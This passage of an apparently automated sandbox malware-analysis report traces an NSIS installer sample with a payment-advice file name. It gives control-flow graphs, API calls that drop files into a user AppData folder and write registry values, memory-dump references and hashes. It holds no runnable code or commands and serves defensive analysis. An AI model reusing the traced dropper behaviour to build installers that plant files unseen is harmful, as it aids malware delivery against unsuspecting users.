                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00402E35
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$v]!
                                                                                                                                          • API String ID: 2803837635-2231877437
                                                                                                                                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001CAF
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F57
                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 100020BB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                          • Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                                                                                                          • Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
                                                                                                                                          • Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                                                                                                          • Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 808 401752-401777 call 402b3a call 4059ac 813 401781-401793 call 405eea call 405935 lstrcatW 808->813 814 401779-40177f call 405eea 808->814 819 401798-401799 call 40617e 813->819 814->819 823 40179e-4017a2 819->823 824 4017a4-4017ae call 40622d 823->824 825 4017d5-4017d8 823->825 832 4017c0-4017d2 824->832 833 4017b0-4017be CompareFileTime 824->833 826 4017e0-4017fc call 405b56 825->826 827 4017da-4017db call 405b31 825->827 835 401870-401899 call 405194 call 403062 826->835 836 4017fe-401801 826->836 827->826 832->825 833->832 848 4018a1-4018ad SetFileTime 835->848 849 40189b-40189f 835->849 837 401852-40185c call 405194 836->837 838 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 836->838 850 401865-40186b 837->850 838->823 870 401847-401848 838->870 852 4018b3-4018be CloseHandle 848->852 849->848 849->852 853 4029d0 850->853 855 4018c4-4018c7 852->855 856 4029c7-4029ca 852->856 857 4029d2-4029d6 853->857 860 4018c9-4018da call 405f0c lstrcatW 855->860 861 4018dc-4018df call 405f0c 855->861 856->853 867 4018e4-402243 call 4056c6 860->867 861->867 867->857 870->850 872 40184a-40184b 870->872 872->837
                                                                                                                                          APIs
                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende,?,?,00000031), ref: 00401793
                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende,?,?,00000031), ref: 004017B8
                                                                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsh2473.tmp$C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll$C:\Users\user\AppData\Local\foreslaaende$Call
                                                                                                                                          • API String ID: 1941528284-3169595403
                                                                                                                                          • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                          • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                          • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                          • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 874 40317d-4031a6 GetTickCount 875 4032e7-4032ef call 402d1a 874->875 876 4031ac-4031d7 call 40330f SetFilePointer 874->876 881 4032f1-4032f6 875->881 882 4031dc-4031ee 876->882 883 4031f0 882->883 884 4031f2-403200 call 4032f9 882->884 883->884 887 403206-403212 884->887 888 4032d9-4032dc 884->888 889 403218-40321e 887->889 888->881 890 403220-403226 889->890 891 403249-403265 call 406390 889->891 890->891 892 403228-403248 call 402d1a 890->892 897 4032e2 891->897 898 403267-40326f 891->898 892->891 899 4032e4-4032e5 897->899 900 403271-403287 WriteFile 898->900 901 4032a3-4032a9 898->901 899->881 903 403289-40328d 900->903 904 4032de-4032e0 900->904 901->897 902 4032ab-4032ad 901->902 902->897 905 4032af-4032c2 902->905 903->904 906 40328f-40329b 903->906 904->899 905->882 907 4032c8-4032d7 SetFilePointer 905->907 906->889 908 4032a1 906->908 907->875 908->905
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                          • WriteFile.KERNELBASE(0040BE78,0040D60C,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                          • SetFilePointer.KERNELBASE(00215D76,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                                          • String ID: v]!$x>A
                                                                                                                                          • API String ID: 2146148272-1808354312
                                                                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 909 403062-403070 910 403072-403088 SetFilePointer 909->910 911 40308e-403097 call 40317d 909->911 910->911 914 403177-40317a 911->914 915 40309d-4030b0 call 405bd9 911->915 918 403163 915->918 919 4030b6-4030ca call 40317d 915->919 921 403165-403166 918->921 919->914 923 4030d0-4030d3 919->923 921->914 924 4030d5-4030d8 923->924 925 40313f-403145 923->925 928 403174 924->928 929 4030de 924->929 926 403147 925->926 927 40314a-403161 ReadFile 925->927 926->927 927->918 930 403168-403171 927->930 928->914 931 4030e3-4030ed 929->931 930->928 932 4030f4-403106 call 405bd9 931->932 933 4030ef 931->933 932->918 936 403108-40311d WriteFile 932->936 933->932 937 40313b-40313d 936->937 938 40311f-403122 936->938 937->921 938->937 939 403124-403137 938->939 939->931 940 403139 939->940 940->928
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                          • String ID: v]!$x>A
                                                                                                                                          • API String ID: 539440098-1808354312
                                                                                                                                          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                          • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                          • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 941 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 948 4029c7-4029d6 941->948 949 40237d-402385 941->949 950 402387-402394 call 402b3a lstrlenW 949->950 951 402398-40239b 949->951 950->951 954 4023ab-4023ae 951->954 955 40239d-4023aa call 402b1d 951->955 959 4023b0-4023ba call 403062 954->959 960 4023bf-4023d3 RegSetValueExW 954->960 955->954 959->960 961 4023d5 960->961 962 4023d8-4024b2 RegCloseKey 960->962 961->962 962->948 966 402793-40279a 962->966 966->948
                                                                                                                                          APIs
                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsh2473.tmp
                                                                                                                                          • API String ID: 1356686001-2395162201
                                                                                                                                          • Opcode ID: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                          • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                          • Opcode Fuzzy Hash: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                          • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 967 4015b9-4015cd call 402b3a call 4059e0 972 401614-401617 967->972 973 4015cf-4015eb call 405962 CreateDirectoryW 967->973 975 401646-402197 call 401423 972->975 976 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 972->976 980 40160a-401612 973->980 981 4015ed-4015f8 GetLastError 973->981 988 4029c7-4029d6 975->988 976->988 990 40163e-401641 976->990 980->972 980->973 984 401607 981->984 985 4015fa-401605 GetFileAttributesW 981->985 984->980 985->980 985->984 990->988
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,75922EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 004059EE
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\foreslaaende,?,00000000,000000F0), ref: 00401630
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\foreslaaende, xrefs: 00401623
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\foreslaaende
                                                                                                                                          • API String ID: 3751793516-1954961325
                                                                                                                                          • Opcode ID: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                          • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                          • Opcode Fuzzy Hash: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                          • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 993 10001771-100017ad call 10001b3e 997 100017b3-100017b7 993->997 998 100018be-100018c0 993->998 999 100017c0-100017cd call 100022eb 997->999 1000 100017b9-100017bf call 100022a1 997->1000 1005 100017fd-10001804 999->1005 1006 100017cf-100017d4 999->1006 1000->999 1007 10001824-10001828 1005->1007 1008 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 1005->1008 1009 100017d6-100017d7 1006->1009 1010 100017ef-100017f2 1006->1010 1011 10001866-1000186c call 1000248d 1007->1011 1012 1000182a-10001864 call 100015cc call 1000248d 1007->1012 1034 1000186d-10001871 1008->1034 1015 100017d9-100017da 1009->1015 1016 100017df-100017e0 call 10002868 1009->1016 1010->1005 1013 100017f4-100017f5 call 10002b23 1010->1013 1011->1034 1012->1034 1028 100017fa 1013->1028 1017 100017e7-100017ed call 1000260b 1015->1017 1018 100017dc-100017dd 1015->1018 1025 100017e5 1016->1025 1033 100017fc 1017->1033 1018->1005 1018->1016 1025->1028 1028->1033 1033->1005 1037 10001873-10001881 call 10002450 1034->1037 1038 100018ae-100018b5 1034->1038 1043 10001883-10001886 1037->1043 1044 10001899-100018a0 1037->1044 1038->998 1040 100018b7-100018b8 GlobalFree 1038->1040 1040->998 1043->1044 1045 10001888-10001890 1043->1045 1044->1038 1046 100018a2-100018ad call 10001555 1044->1046 1045->1044 1047 10001892-10001893 FreeLibrary 1045->1047 1046->1038 1047->1044
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                            • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                            • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                            • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                            • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1767494692-3916222277
                                                                                                                                          • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                          • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                                          • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                          • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1050 405db7-405de9 RegOpenKeyExW 1051 405e2b-405e2e 1050->1051 1052 405deb-405e0a RegQueryValueExW 1050->1052 1053 405e18 1052->1053 1054 405e0c-405e10 1052->1054 1056 405e1b-405e25 RegCloseKey 1053->1056 1055 405e12-405e16 1054->1055 1054->1056 1055->1053 1055->1056 1056->1051
                                                                                                                                          APIs
